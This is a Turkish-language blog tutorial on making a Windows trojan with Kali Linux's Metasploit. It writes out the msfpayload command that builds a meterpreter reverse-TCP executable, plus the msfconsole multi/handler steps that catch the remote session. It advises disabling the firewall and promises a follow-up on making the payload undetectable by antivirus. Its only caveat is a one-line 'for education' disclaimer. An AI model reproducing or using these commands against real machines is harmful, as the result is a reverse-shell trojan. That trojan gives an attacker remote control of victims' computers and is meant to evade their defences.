virüs-yapımı

Trojan Nasıl Oluşturulur? – Kali Linux Metasploit Kullanarak Virüs Yapımı

Genel Siber Güvenlik

Metasploit, Kali Linux içerisinde kurulu olarak gelen ve trojanları kontrol etmemizi, hedef makinede gezinmemizi, trojan,backdoor vs. oluşturabilmemizi sağlayan bir frameworktür. Bu yazıda bir çeşit trojan yani virüs yapma programı  sayılabilecek Metasploit’ten yardım alarak bir virüs nasıl yapılır öğrenmiş olacağız. Hadi gelin artık trojan yapımına başlayalım…

** Bu kaynak eğitim için hazırlanmıştır, her türlü kullanım ve işlemlerinizden sadece sizin sorumlu olduğunuzu unutmayınız! 
[toc]

Msfpayload ile Payload Oluşturalım

Msfpayload komutu, hedef sisteme göre farklı payloadlar üretebileceğimiz bir komuttur. Payloadlar, hacker’a hedef sistem üzerinde çeşitli şeyler yapabilme hakkı verir. Örneğin bir reverse tcp shell çalıştırabilir yada bir vnc programı çalıştırabilirsiniz.

Daha fazla uzatmadan msfpayload ile trojan yapımı için payloadımızı oluşturalım.
msfpayload windows/meterpreter/reverse_tcp LHOST=ip_adresiniz LPORT=baglantiyi_alacak_port > /Desktop/trojan.exe

Yukarıdaki komut satırı ile trojan.exe adında reverse tcp kullanan bir virüs oluşturmuş olduk. (Bu komut, windowstan kendi makinemize ters tcp bağlantısı sağlayacak bir payload oluşturur) Koyu renk ile belirttiğim “ip_adresiniz” ve “bağlantiyi_alacak_port” bilgilerinizi kendi ip adresiniz ve belirediğiniz bir port olacak şekilde değiştirmelisiniz.

Oluşturduğumuz bu payloadı Windows makinenize geçirmeyi unutmayın.

Msfconsole ile Dinleme Moduna Geçelim

  1. msfconsole” komutu ile metasploit frameworkünü çalıştıralım.
  2. use exploit/multi/handler” komutu ile kullanacağımız exploiti belirtelim. (Bu exploit, trojan.exe’den gelecek tcp bağlantısını alacak)
  3. show options” diyerek değişiklik yapmanız gereken bilgileri görün. Bu exploit için bizim LHOST, LPORT ve payload belirtmemiz gerekiyor.
  4. set LHOST ip_adresiniz” komutu ile ip adresinizi belirtin.
  5. set LPORT baglantiyi_alacak_port” komutu ile bağlantıyı dinleyeceğiniz portu belirtin.
  6. set payload windows/meterpreter/reverse_tcp” komutu ile dinleyeceğimiz payloadı belirtin.
  7. “run” komutu ile dinleme işlemini başlatın.

Yukarıdaki işlemleri yaptıktan sonra, Windows makineden oluşturduğunuz trojan.exe’yi çalıştırın. (Güvenlik duvarını kapatmanız gerekebilir, çünkü henüz undetected yapmadık) Trojan.exe çalıştığında metasploitteki dinleme erkanında session oluşacak ve otomatik olarak meterpreter çalışacak.

Bu yazıda, Kali Linux’ta Metasploit frameworkü ve Msfpayload kullanarak nasıl virüs yapılır? sorusuna yanıt vermiş oldum. Trojan yapımı bitti, fakat oluşturduğumuz virüs antivirüs programları ve güvenlik duvarları tarafından tespit edilebiliyor. Bir sonraki yazıda, oluşturmuş olduğumuz virüsü antivirüslere yakalanmaz hale getireceğim. Yani undetectable yapacağım…

Bu yazı hoşunuza gittiyse Manuel SQL Injection yazım da ilginizi çekebilir…

Kaynak:
https://www.binarytides.com/trojan-windows-xp-7-metasploit/

Bir cevap yazın